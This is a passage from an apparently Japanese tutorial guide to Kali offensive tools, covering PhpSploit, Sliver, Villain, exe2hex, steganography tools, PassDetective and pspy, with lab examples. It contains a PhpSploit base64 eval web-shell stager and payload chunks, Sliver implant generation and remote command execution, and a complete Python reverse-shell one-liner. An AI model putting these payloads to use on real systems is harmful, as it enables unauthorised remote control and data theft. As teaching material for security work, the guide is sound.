Zzae: cigkaCk7CnJldHVybiAoVHJ1ZSk7Cn0KZWxzZQpyZXR1cm4gKEZhbHNlKTsKfQplbHNlaWYgKCRtb2RlID09ICd3JyB8fCAkbW9kZSA9PSAnYScpCnsKJG9sZF9tdGltZSA9IEBmaWxlbXRpbWUoJGFic3BhdGgpOwokb2xkX2F0aW1lID0gQGZpbGVhdGltZSgkYWJzcGF0aCk7CiRyYW5kID0gJGFic3BhdGggLiB1bmlxaWQoJy9wc3BhcGlfJyk7CmlmICgkaCA9IEBmb3BlbigkcmFuZCwgJ2EnKSkKewpAZmNsb3NlKCRoKTsKJHJlc3VsdCA9IFRydWU7Cn0KZWxzZQp7CiRyZXN1bHQgPSBGYWxzZTsKfQpAdW5saW5rKCRyYW5kKTsKQHRvdWNoKCRhYnNwYXRoLCAkb2xkX210aW1lLCAkb2xkX2F0aW1lKTsKcmV0dXJuICgkcmVzdWx0KTsKfQplbHNlCnJldHVybiAoRmFsc2UpOwp9CmZ1bmN0aW9uIGdldFBlcm1zKCRhYnNwYXRoLCAkcGVybXNfZm9ybWF0PSJ1bml4IikKewpnbG9iYWwgJFBIUFNQTE9JVDs
Zzaf: KJHBlcm1zID0gQGZpbGVwZXJtcygkYWJzcGF0aCk7CmlmICgoJHBlcm1zICYgMHhDMDAwKSA9PSAweEMwMDApCiR0eXBlID0gJ3MnOwplbHNlaWYgKCgkcGVybXMgJiAweEEwMDApID09IDB4QTAwMCkKJHR5cGUgPSAnbCc7CmVsc2VpZiAoKCRwZXJtcyAmIDB4ODAwMCkgPT0gMHg4MDAwKQokdHlwZSA9ICctJzsKZWxzZWlmICgoJHBlcm1zICYgMHg2MDAwKSA9PSAweDYwMDApCiR0eXBlID0gJ2InOwplbHNlaWYgKCgkcGVybXMgJiAweDQwMDApID09IDB4NDAwMCkKJHR5cGUgPSAnZCc7CmVsc2VpZiAoKCRwZXJtcyAmIDB4MjAwMCkgPT0gMHgyMDAwKQokdHlwZSA9ICdjJzsKZWxzZWlmICgoJHBlcm1zICYgMHgxMDAwKSA9PSAweDEwMDApCiR0eXBlID0gJ3AnOwplbHNlCiR0eXBlID0gJ3UnOwppZiAoKHN1YnN0cigkYWJzcGF0aCwgLTMpID09ICRQSFBTUExPSVRbJ1BBVEhfU0VQJ10gLiAnLi4nKS
Zzag: B8fAooc3Vic3RyKCRhYnNwYXRoLCAtMikgPT0gJFBIUFNQTE9JVFsnUEFUSF9TRVAnXSAuICcuJykpCiR0eXBlID0gJ2QnOwppZiAoJHBlcm1zX2Zvcm1hdCA9PSAndW5peCcpewokaW5mbyA9ICIiOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDEwMCkgPyAncicgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA4MCkgPyAndycgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA0MCkgPwooKCRwZXJtcyAmIDB4MDgwMCkgPyAncycgOiAneCcgKSA6CigoJHBlcm1zICYgMHgwODAwKSA/ICdTJyA6ICctJykpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAyMCkgPyAncicgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAxMCkgPyAndycgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAwOCkgPwooKCRwZXJtcyAmIDB4MDQwMCkgPyAncycgOiAneCcgKSA6CigoJHBlcm1zI
Zzah: CYgMHgwNDAwKSA/ICdTJyA6ICctJykpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAwNCkgPyAncicgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAwMikgPyAndycgOiAnLScpOwokaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAwMSkgPwooKCRwZXJtcyAmIDB4MDIwMCkgPyAndCcgOiAneCcgKSA6CigoJHBlcm1zICYgMHgwMjAwKSA/ICdUJyA6ICctJykpO30KZWxzZQp7CiRScGVybSA9ICgoJHBlcm1zICYgMHgwMDA0KSA/ICdyJyA6ICctJyk7CiRXcGVybSA9ICgoJHBlcm1zICYgMHgwMDAyKSA/ICd3JyA6ICctJyk7CiRYcGVybSA9ICgoJHBlcm1zICYgMHgwMDAxKSA/CigoJHBlcm1zICYgMHgwMjAwKSA/ICd0JyA6ICd4JyApIDoKKCgkcGVybXMgJiAweDAyMDApID8gJ1QnIDogJy0nKSk7CmlmICgkdHlwZSA9PSAnLScpCnsKaWYgKGZpbGVBY2Nlc3MoJGFic3BhdGgsICdyJykpCiRScGVy
Zzai: bSA9ICdyJzsKZWxzZQokUnBlcm0gPSAnLSc7CmlmIChjYW5fY2hhbmdlX210aW1lKCRhYnNwYXRoKSkKewppZiAoZmlsZUFjY2VzcygkYWJzcGF0aCwgJ3cnKSkKJFdwZXJtID0gJ3cnOwplbHNlCiRXcGVybSA9ICctJzsKfQp9CmVsc2VpZiAoJHR5cGUgPT0gJ2QnKQp7CmlmIChkaXJBY2Nlc3MoJGFic3BhdGgsICdyJykpCnsKJFJwZXJtID0gJ3InOwokWHBlcm0gPSAneCc7Cn0KZWxzZQp7CiRScGVybSA9ICctJzsKJFhwZXJtID0gJy0nOwp9CmlmIChjYW5fY2hhbmdlX210aW1lKCRhYnNwYXRoKSkKewppZiAoZGlyQWNjZXNzKCRhYnNwYXRoLCAndycpKQokV3Blcm0gPSAndyc7CmVsc2UKJFdwZXJtID0gJy0nOwp9Cn0KJGluZm8gPSAkUnBlcm0gLiAkV3Blcm0gLiAkWHBlcm07Cn0KcmV0dXJuICgkdHlwZSAuICRpbmZvKTsKfQpmdW5jdGlvbiBnZXRTaXplKCRhYnNwYXRoKQp7CiRzaXplID0gQGZ
Zzaj: pbGVzaXplKCRhYnNwYXRoKTsKJHVuaXRzID0gYXJyYXkoJycsICdLJywgJ00nLCAnRycsICdUJyk7CmZvciAoJGkgPSAwOyAkc2l6ZSA+PSAxMDI0ICYmICRpIDwgNDsgJGkrKykKJHNpemUgLz0gMTAyNDsKJHJlc3VsdCA9IHN0cl9yZXBsYWNlKCcuJywgJywnLCByb3VuZCgkc2l6ZSwgMSkpIC4gJHVuaXRzWyRpXTsKcmV0dXJuICgkcmVzdWx0KTsKfQpmdW5jdGlvbiBtYXRjaFJlZ2V4cCgkbmFtZSwgJHJlZ2V4cCkKewppZiAoJHJlZ2V4cCA9PSAnJykKcmV0dXJuIChUcnVlKTsKZWxzZWlmIChzdHJzdHIoJHJlZ2V4cCwgJyonKSA9PT0gRmFsc2UpCnsKaWYgKCRuYW1lID09ICRyZWdleHApCnJldHVybiAoVHJ1ZSk7CmVsc2UKcmV0dXJuIChGYWxzZSk7Cn0KZWxzZQp7CiRuYW1lID0gc3RyX3JlcGxhY2UoJy4nLCAnXC4nLCAkbmFtZSk7CiRtYXRjaCA9ICcoXicgLiBzdHJfcmVwbGFjZSgnKicsIC
Zzak: cuKicsICRyZWdleHApIC4gJyQpJzsKaWYgKHByZWdfbWF0Y2goJG1hdGNoLCAkbmFtZSkpCnJldHVybiAoVHJ1ZSk7CmVsc2UKcmV0dXJuIChGYWxzZSk7Cn0KfQpmdW5jdGlvbiBwcmludExzdCgkbHNkaXIsICRyZWdleCkKewokdGV4dCA9IGFycmF5KCk7CmlmICgkZGggPSBAb3BlbmRpcigkbHNkaXIpKQp7CndoaWxlICgoJGVsZW0gPSByZWFkZGlyKCRkaCkpICE9PSBGQUxTRSkKewppZiAobWF0Y2hSZWdleHAoJGVsZW0sJHJlZ2V4KSkKewokZWxlbXBhdGggPSAkbHNkaXIuJGVsZW07CiRtb2RlICA9IGdldFBlcm1zKCRlbGVtcGF0aCk7CiR3bW9kZSA9IGdldFBlcm1zKCRlbGVtcGF0aCwgJ3dpbicpOwokb3duZXIgPSBnZXRPd25lcigkZWxlbXBhdGgpOwokZ3JvdXAgPSBnZXRHcm91cCgkZWxlbXBhdGgpOwokc2l6ZSAgPSBnZXRTaXplKCRlbGVtcGF0aCk7CiR0aW1lICA9IGdldE1UaW1lKCRlb
Zzal: GVtcGF0aCwgJ0QgTSBkIEg6aTpzIE8gWScpOwokdGV4dFtdID0gYXJyYXkoJG1vZGUsICR3bW9kZSwgJG93bmVyLCAkZ3JvdXAsICRzaXplLCAkdGltZSwgJGVsZW0pOwp9Cn0KY2xvc2VkaXIoJGRoKTsKfQpyZXR1cm4gKCR0ZXh0KTsKfQokbHNkaXIgPSAkUEhQU1BMT0lUWydUQVJHRVQnXSAuICRQSFBTUExPSVRbJ1NFUEFSQVRPUiddOwokcmVnZXggPSAnJzsKJEVSUk9SID0gJyc7CmlmICghZGlyQWNjZXNzKCRsc2RpciwncicpKQp7CmlmIChAaXNfZGlyKCRsc2RpcikpCiRFUlJPUiA9IGVycm9yKCJjYW5ub3Qgb3BlbiAlczogUGVybWlzc2lvbiBkZW5pZWQiLCBzdWJzdHIoJGxzZGlyLDAsLTEpKTsKZWxzZWlmICgkUEhQU1BMT0lUWydQQVJTRSddKQp7CiRzcGxpdCA9IHN0cnJwb3MoJFBIUFNQTE9JVFsnVEFSR0VUJ10sICRQSFBTUExPSVRbJ1NFUEFSQVRPUiddKSArIDE7CiRsc2RpciA9IHN1
Zzam: YnN0cigkUEhQU1BMT0lUWydUQVJHRVQnXSwgMCwgJHNwbGl0KTsKJHJlZ2V4ID0gc3Vic3RyKCRQSFBTUExPSVRbJ1RBUkdFVCddLCAkc3BsaXQpOwp9Cn0KaWYgKHN0cnN0cihzdWJzdHIoJGxzZGlyLCAwLCAtMSksICRQSFBTUExPSVRbJ1NFUEFSQVRPUiddKSA9PT0gRkFMU0UpCiRkaXJuYW1lID0gJGxzZGlyOwplbHNlCiRkaXJuYW1lID0gc3Vic3RyKCRsc2RpciwgMCwgLTEpOwppZiAoZGlyQWNjZXNzKCRsc2RpciwgJ3InKSkKewokUiA9IGFycmF5KCRkaXJuYW1lLCAkcmVnZXgsIHByaW50THN0KCRsc2RpciwgJHJlZ2V4KSk7CmlmICghY291bnQoJFJbMl0pKQpyZXR1cm4gZXJyb3IoIiVzOiBubyBlbGVtZW50cyBtYXRjaGluZyAnJXMnIiwgJGRpcm5hbWUsICRyZWdleCk7CmVsc2UKcmV0dXJuICRSOwp9CmVsc2VpZiAoISRFUlJPUikKewppZiAoQGlzX2RpcigkbHNkaXIpKQpyZXR1cm4gZXJ
Zzan: yb3IoImNhbm5vdCBvcGVuICVzOiBQZXJtaXNzaW9uIGRlbmllZCIsICRkaXJuYW1lKTsKZWxzZQpyZXR1cm4gZXJyb3IoImNhbm5vdCBhY2Nlc3MgJXM6IE5vIHN1Y2ggZmlsZSBvciBkaXJlY3RvcnkuIiwgJGRpcm5hbWUpOwp9CmVsc2UKcmV0dXJuICRFUlJPUjsKfQokcmVzdWx0ID0gcGF5bG9hZCgpOwppZiAoISBpc19hcnJheSgkcmVzdWx0KSB8fCBhcnJheV9rZXlzKCRyZXN1bHQpICE9PSBhcnJheSgnX19FUlJPUl9fJykpCiRyZXN1bHQgPSBhcnJheSgnX19SRVNVTFRfXycgPT4gJHJlc3VsdCk7CmVjaG8gZ3pjb21wcmVzcyhzZXJpYWxpemUoJHJlc3VsdCkpOwpmb3JlYWNoICgkb3JpZ19jb25mIGFzICRrZXkgPT4gJHZhbCkKQGluaV9zZXQoJGtleSwgJHZhbCk7ZWNobyAiNjA3Njg2ZjYtODFmYS00Y2JmLWJkNjUtNzkzZDI2MjZkMDAyIjs=
Host: 192.168.11.4
# Phpspl01Tヘッダーの内容
$s=$_SERVER;ksort($s);$x="";foreach($s as $a=>$b)if(substr($a,0,7)=='HTTP_ZZ')$x.=$b;eval(base64_decode("$x"));
# Zzaa~Zzanを連結した内容
echo "607686f6-81fa-4cbf-bd65-793d2626d002";
[...]
function payload()
{
global $PHPSPLOIT;
$PHPSPLOIT = unserialize(
base64_decode(
"YTo0OntzOjg6IlBBVEhfU0VQIjtzOjE6Ii8iO3M6NjoiVEFSR0VUIjtzOjg6Ii92YXIvd3d3IjtzOjk6IlNFUEFSQVRPUiI7czoxOiIvIjtzOjU6IlBBUlNFIjtpOjA7fQ=="
)
);
function getOwner($abspath)
{
if (function_exists("posix_getpwuid")) {
$uid = @filegroup($abspath);
$usr = @posix_getpwuid($uid);
if (@is_string($usr["name"]) && !@empty($usr["name"])) {
return $usr["name"];
}
}
return "?";
}
[...]
}
$result = payload();
if (!is_array($result) || array_keys($result) !== ["__ERROR__"]) {
$result = ["__RESULT__" => $result];
}
echo gzcompress(serialize($result));
foreach ($orig_conf as $key => $val) {
@ini_set($key, $val);
}
echo "607686f6-81fa-4cbf-bd65-793d2626d002";
Sliver
マルチユーザーモードを搭載し、mTLS、WireGuard、HTTP(S)およびDNS上でコマンド・アンド・コントロール チャネルを作成します。
■ 使用方法
root@kali:~# sliver-server --help
Usage:
sliver-server [flags]
sliver-server [command]
Available Commands:
builder Start the process as an external builder
completion Generate the autocompletion script for the specified shell
daemon Force start server in daemon mode
export-ca Export certificate authority
help Help about any command
import-ca Import certificate authority
operator Generate operator configuration files
unpack Unpack assets and exit
version Print version and exit
Flags:
-h, --help help for sliver-server
root@kali:~# sliver-client --help
Usage:
sliver-client [flags]
sliver-client [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
help Help about any command
import Import a client configuration file
version Print version and exit
Flags:
-h, --help help for sliver-client
■ 使用例
root@kali_1:~# sliver-server
[...]
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
# 標的のホストで実行させるimplant(リモートアクセスを可能にするシェルコード)を作成
[server] sliver > generate --os linux --mtls 192.168.11.3:8888 --save payload
[*] Generating new linux/amd64 implant binary
[*] Implant saved to /root/payload
# mTLSリスナーを起動
[server] sliver > mtls
[*] Starting mTLS listener ...
[*] Successfully started job #1
[server] sliver >
# 標的ホストでimplantを実行
root@kali_2:~# ./payload
root@kali_1:~#
[server] sliver >
# implantを実行すると標的ホストとのセッションが作成される
[*] Session 2364510a WASTEFUL_CUCUMBER - 192.168.11.4:45900 (kali_2) - linux/amd64 - Wed, 13 Nov 2024 11:47:23 UTC
[server] sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ================== ========== ========== ================== =========
2364510a mtls 192.168.11.4:45900 kali_2 root linux/amd64 [ALIVE]
# セッションに接続
[server] sliver > use 2364510a
[*] Active session WASTEFUL_CUCUMBER (2364510a-4b9e-4534-85b1-7264ca73ef20)
# 標的ホストでコマンドを実行
[server] sliver (WASTEFUL_CUCUMBER) > execute -o cat /etc/passwd
[*] Output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
[...]
root@kali_1:~# sliver-server
[...]
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
# オペレーター用の設定ファイルを作成
[server] sliver > new-operator --name hello --lhost 192.168.11.3
[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /root/hello_192.168.11.3.cfg
# マルチプレイヤーモード(gRPCリスナー)を起動
[server] sliver > multiplayer
[*] Multiplayer mode enabled!
# 標的のホストで実行させるimplant(リモートアクセスを可能にするシェルコード)を作成
[server] sliver > generate --os linux --mtls 192.168.56.3:8888 --save payload
[*] Generating new linux/amd64 implant binary
[*] Implant saved to /root/payload
# # mTLSリスナーを起動
[server] sliver > mtls --lhost 192.168.56.3
[*] Starting mTLS listener ...
[*] Successfully started job #2
[server] sliver >
# オペレーターホストでサーバーで作成した設定ファイルをインポート
root@kali_2:~# sliver-client import hello_192.168.11.3.cfg
2024/11/13 09:22:20 Saved new client config to: /root/.sliver-client/configs/hello_192.168.11.3.cfg
# クライアントを起動するとサーバーに接続される
root@kali_2:~# sliver-client
Connecting to 192.168.11.3:31337 ...
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver >
# 標的ホストでimplantを実行
root@kali_3:~# ./payload
# サーバーを介してオペレーターにセッションが通知される
root@kali_2:~#
[*] Session 6a314c82 AMUSED_OVERCOAT - 192.168.56.4:40728 (kali_3) - linux/amd64 - Thu, 14 Nov 2024 04:04:15 UTC
sliver > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ================== ========== ========== ================== =========
6a314c82 mtls 192.168.56.4:40728 kali_3 root linux/amd64 [ALIVE]
# オペレーターからセッションに接続
sliver > use 6a314c82
[*] Active session AMUSED_OVERCOAT (6a314c82-7821-4613-ba04-c063df2214e4)
# オペレーターからサーバーを介して別ネットワーク上の標的ホストでNmapを実行
sliver (AMUSED_OVERCOAT) > execute -o nmap 192.168.56.5
[*] Output:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 04:08 UTC
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 02:42:AC:13:00:04 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
Villain
マルチユーザーモードを搭載し、複数のリバースTCPシェルやHoaxShellベースのシェルを用いてコマンド・アンド・コントロール チャネルを作成します。
■ 使用方法
root@kali:~# villain --help
usage: Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-n REVERSE_TCP_PORT] [-f FILE_SMUGGLER_PORT] [-i] [-c CERTFILE] [-k KEYFILE] [-v] [-q]
options:
-h, --help show this help message and exit
-p PORT, --port PORT Team server port (default: 6501).
-x HOAX_PORT, --hoax-port HOAX_PORT
HoaxShell server port (default: 8080 via http, 443 via https).
-n REVERSE_TCP_PORT, --reverse-tcp-port REVERSE_TCP_PORT
Reverse TCP multi-handler port (default: 4443).
-f FILE_SMUGGLER_PORT, --file-smuggler-port FILE_SMUGGLER_PORT
Http file smuggler server port (default: 8888).
-i, --insecure Allows any Villain client (sibling server) to connect to your instance without prompting you for verification.
-c CERTFILE, --certfile CERTFILE
Path to your ssl certificate (for HoaxShell https server).
-k KEYFILE, --keyfile KEYFILE
Path to the private key for your certificate (for HoaxShell https server).
-v, --version Show program's version number and exit.
-q, --quiet Do not print the banner on startup.
■ 使用例
# ホスト1でサーバーを起動
root@kali_1:~# villain
[Info] Initializing required services:
[0.0.0.0:6501]::Team Server
[0.0.0.0:4443]::Reverse TCP Multi-Handler
[0.0.0.0:8080]::HoaxShell Multi-Handler
[0.0.0.0:8888]::HTTP File Smuggler
Villain >
# ホスト2でもサーバーを起動
root@kali_2:~# villain
[Info] Initializing required services:
[0.0.0.0:6501]::Team Server
[0.0.0.0:4443]::Reverse TCP Multi-Handler
[0.0.0.0:8080]::HoaxShell Multi-Handler
[0.0.0.0:8888]::HTTP File Smuggler
# ホスト1に接続要求を行う
Villain > connect 192.168.11.3 6501
[Info] Sending request to connect...
root@kali_1:~# villain
[...]
# ホスト2からの接続要求が届くので承認する
[Info] Received request to connect from 192.168.11.4
[Info] Type 0829 and press ENTER to accept. You have 10 seconds.
Villain > 0829
[Info] Synchronizing servers...
[Info] Synchronized!
# 標的ホストで実行するペイロードを作成(コードが表示されるので手動でコピー&ペーストする)
Villain > generate payload=linux/reverse_tcp/python3 lhost=192.168.56.3
Generating payload...
nohup python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.3",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > /dev/null 2>&1 & disown
# 作成したペイロードを標的ホストで実行
root@kali_3:~# ./payload
# ホスト1に標的ホストとのセッションが確立したことが通知される
root@kali_1:~# villain
[...]
[Shell] 4e7d50-465d46-55aa6f - New session established -> 192.168.56.4 at 2024-11-28 03:53:51.
Villain >
# ホスト2にも標的ホストとのセッションが確立したことが通知される
root@kali_2:~# villain
[...]
[Shell] 4e7d50-465d46-55aa6f - New session established -> 192.168.56.4 at 2024-11-28 03:53:51.
# ホスト2からホスト1経由で標的ホストに接続
Villain > shell 4e7d50-465d46-55aa6f
Interactive pseudo-shell activated.
Press Ctrl + C or type "exit" to deactivate.
┌──(root㉿kali_3)-[~]
└─# hostname
kali_3
Misc Exploit
exe2hex
バイナリ形式の実行ファイルをASCIIテキスト形式のファイルにエンコードします。
■ 使用方法
root@kali:~# exe2hex --help
Usage: exe2hex [options]
Options:
-h, --help show this help message and exit
-x EXE The EXE binary file to convert
-s Read from STDIN
-b BAT BAT output file (DEBUG.exe method - x86)
-p POSH PoSh output file (PowerShell method - x86/x64)
-e URL encode the output
-r TEXT pRefix - text to add before the command on each line
-f TEXT suFfix - text to add after the command on each line
-l INT Maximum HEX values per line
-c Clones and compress the file before converting (-cc for higher
compression)
-t Create a Expect file, to automate to a Telnet session.
-w Create a Expect file, to automate to a WinEXE session.
-v Enable verbose mode
■ 使用例
root@kali:~# exe2hex -x hello.exe -p hello.cmd
[*] exe2hex v1.5.1
[+] Successfully wrote (PoSh) hello.cmd
# エンコードしたファイルの中身がASCIIテキストになっている
root@kali:~# cat hello.cmd
echo|set /p="">hello.hex
echo|set /p="4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000">>hello.hex
echo|set /p="504500004c0103001233fd660000000000000000e00002010b010b00005a000000080000000000003e79000000200000008000000000400000200000000200000400000000000000040000000000000000c000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000">>hello.hex
echo|set /p="e87800005300000000800000d00400000000000000000000000000000000000000a000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000">>hello.hex
[...]
echo|set /p="0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000">>hello.hex
powershell -Command "$h=Get-Content -readcount 0 -path './hello.hex';$l=$h[0].length;$b=New-Object byte[] ($l/2);$x=0;for ($i=0;$i -le $l-1;$i+=2){$b[$x]=[byte]::Parse($h[0].Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);$x+=1};set-content -encoding byte 'hello.exe' -value $b;Remove-Item -force hello.hex;"
作成したコマンドスクリプトを実行するとexe形式の実行ファイルが作成される
exeファイルを実行
OutGuess
PPM(Portable Pixel Map)、PNM(Portable Any Map)、JPEG画像内にデータを隠すことができるステガノグラフィーツールです。
■ 使用方法
root@kali:~# outguess -h
outguess [options] [<input file> [<output file>]]
-h print this usage help text and exit
-[sS] <n> iteration start, capital letter for 2nd dataset
-[iI] <n> iteration limit
-[kK] <key> key
-[dD] <name> filename of dataset
-[eE] use error correcting encoding
-p <param> parameter passed to destination data handler
-r retrieve message from data
-x <n> number of key derivations to be tried
-m mark pixels that have been modified
-t collect statistic information
-F[+-] turns statistical steganalysis foiling on/off.
The default is on.
■ 使用例
テキスト埋め込み前
root@kali:~# echo "Hello World" > message.txt
root@kali:~# outguess -k "hello" -d message.txt cat.jpg cat-with-message.jpg
Reading cat.jpg....
JPEG compression quality set to 75
Extracting usable bits: 17842 bits
Correctable message size: 9400 bits, 52.68%
Encoded 'message.txt': 96 bits, 12 bytes
Finding best embedding...
[...]
テキスト埋め込み後
root@kali:~# outguess -k "hello" -r cat-with-message.jpg message-within-jpg.txt
Reading cat-with-message.jpg....
Extracting usable bits: 17842 bits
Steg retrieve: seed: 12, len: 12
root@kali:~# cat message-within-jpg.txt
Hello World
PassDetective
シェルのコマンド履歴をスキャンして、誤って書き込まれたパスワードや API キー、シークレットを検出します。
■ 使用方法
root@kali:~# PassDetective --help
Usage:
PassDetective [flags]
PassDetective [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
extract Extract passwords from shell history
help Help about any command
Flags:
-h, --help Help message for PassDetective
■ 使用例
# bashの履歴からシークレットを検索
root@kali:~# PassDetective extract --secrets --bash
===============================================================
Scan is started.
===============================================================
Stripe API Key
curl https://api.stripe.com/v1/charges -u "sk_live_012345678901234567890123" -d amount=1099 -d currency=usd -d source=tok_visa
===============================================================
Scan is finished.
===============================================================
pspy
他のユーザーによって実行されたコマンドやcronジョブなどをリアルタイムで監視します。
■ 使用方法
root@kali:~# pspy --help
Usage:
pspy [flags]
Flags:
-c, --color color the printed events (default true)
--debug print detailed error messages
-d, --dirs stringArray watch these dirs
-f, --fsevents print file system events to stdout
-h, --help help for pspy
-i, --interval int scan every 'interval' milliseconds for new processes (default 100)
--ppid record process ppids
-p, --procevents print new processes to stdout (default true)
-r, --recursive_dirs stringArray watch these dirs recursively (default [/usr,/tmp,/etc,/home,/var,/opt])
-t, --truncate int truncate process cmds longer than this (default 2048)
■ 使用例
# リモートホストにSSH接続してpspyを実行
root@kali:~# ssh hello@192.168.11.4
$ pspy
2024/11/06 07:38:53 CMD: UID=1000 PID=1303 | pspy
2024/11/06 07:38:53 CMD: UID=1000 PID=1180 | -sh
2024/11/06 07:38:53 CMD: UID=1000 PID=1179 | sshd-session: hello@pts/1
2024/11/06 07:38:53 CMD: UID=0 PID=1173 | sshd-session: hello [priv]
2024/11/06 07:38:53 CMD: UID=0 PID=1075 | sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
2024/11/06 07:38:53 CMD: UID=0 PID=1 | bash
# リモートホストで別のユーザーが実行したコマンドがリアルタイムで表示される
2024/11/06 07:47:13 CMD: UID=0 PID=1323 | curl http://example.com
2024/11/06 07:47:38 CMD: UID=0 PID=1325 | ping 8.8.8.8
Raven
リモートクライアントからHTTPでファイルを受信します。
■ 使用方法
root@kali:~# raven --help
usage: raven <listening_ip> <listening_port> [--allowed-ip <allowed_client_ip>] [--upload-folder <upload_directory>] [--organize-uploads]
positional arguments:
host The IP address for our http handler to listen on
port The port for our http handler to listen on
options:
-h, --help show this help message and exit
--allowed-ip ALLOWED_IP
Restrict access to our http handler by IP address (optional)
--upload-folder UPLOAD_FOLDER
Designate the directory to save uploaded files to (default: current working directory)
--organize-uploads Organize file uploads into subfolders by remote client IP
■ 使用例
# 標的ホストでサービスを起動
root@kali:~# raven 0.0.0.0 443
[*] Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/)
[*] Listener access is unrestricted
[*] Uploads will be saved in /root
# 標的ホストに対してファイルを送信
root@kali:~# curl -F "file=@evil.exe" http://192.168.11.4:443
# ファイルが保存される
root@kali:~# raven 0.0.0.0 443
[...]
192.168.11.3 - - [07/Nov/2024 08:55:36] "File saved /root/evil.exe"
Steghide
様々な種類の画像や音声ファイルにデータを隠すことができるステガノグラフィーツールです。
■ 使用方法
root@kali:~# steghide --help
the first argument must be one of the following:
embed, --embed embed data
extract, --extract extract data
info, --info display information about a cover- or stego-file
info <filename> display information about <filename>
encinfo, --encinfo display a list of supported encryption algorithms
version, --version display version information
license, --license display steghide\'s license
help, --help display this usage information
embedding options:
-ef, --embedfile select file to be embedded
-ef <filename> embed the file <filename>
-cf, --coverfile select cover-file
-cf <filename> embed into the file <filename>
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to embed data
-sf, --stegofile select stego file
-sf <filename> write result to <filename> instead of cover-file
-e, --encryption select encryption parameters
-e <a>[<m>]|<m>[<a>] specify an encryption algorithm and/or mode
-e none do not encrypt data before embedding
-z, --compress compress data before embedding (default)
-z <l> using level <l> (1 best speed...9 best compression)
-Z, --dontcompress do not compress data before embedding
-K, --nochecksum do not embed crc32 checksum of embedded data
-N, --dontembedname do not embed the name of the original file
-f, --force overwrite existing files
-q, --quiet suppress information messages
-v, --verbose display detailed information
extracting options:
-sf, --stegofile select stego file
-sf <filename> extract data from <filename>
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to extract data
-xf, --extractfile select file name for extracted data
-xf <filename> write the extracted data to <filename>
-f, --force overwrite existing files
-q, --quiet suppress information messages
-v, --verbose display detailed information
options for the info command:
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to get info about embedded data
■ 使用例
テキスト埋め込み前
root@kali:~# echo "Hello World" > message.txt
root@kali:~# steghide embed -ef message.txt -cf cat.jpg -sf cat-with-message.jpg -p hello
embedding "message.txt" in "cat.jpg"... done
writing stego file "cat-with-message.jpg"... done
テキスト埋め込み後
root@kali:~# steghide extract -sf cat-with-message.jpg -xf hidden-message.txt -p hello
wrote extracted data to "hidden-message.txt".
root@kali:~# cat hidden-message.txt
Hello World
Stegseek
Steghideでデータを埋め込まれたファイルを単語リストを使ってパスフレーズを解読しクラッキングします。
■ 使用方法
root@kali:~# stegseek --help
stegseek [stegofile.jpg] [wordlist.txt]
Commands:
--crack Crack a stego file using a wordlist. This is the default mode.
--seed Crack a stego file by attempting all embedding patterns.
This mode can be used to detect a file encoded by steghide.
In case the file was encoded without encryption, this mode will
even recover the embedded file.
Positional arguments:
--crack [stegofile.jpg] [wordlist.txt] [output.txt]
--seed [stegofile.jpg] [output.txt]
Keyword arguments:
-sf, --stegofile select stego file
-wl, --wordlist select the wordlist file
-xf, --extractfile select file name for extracted data
-t, --threads set the number of threads. Defaults to the number of cores.
-f, --force overwrite existing files
-v, --verbose display detailed information
-q, --quiet hide performance metrics (can improve performance)
-s, --skipdefault don\'t add guesses to the wordlist (empty password, filename, ...)
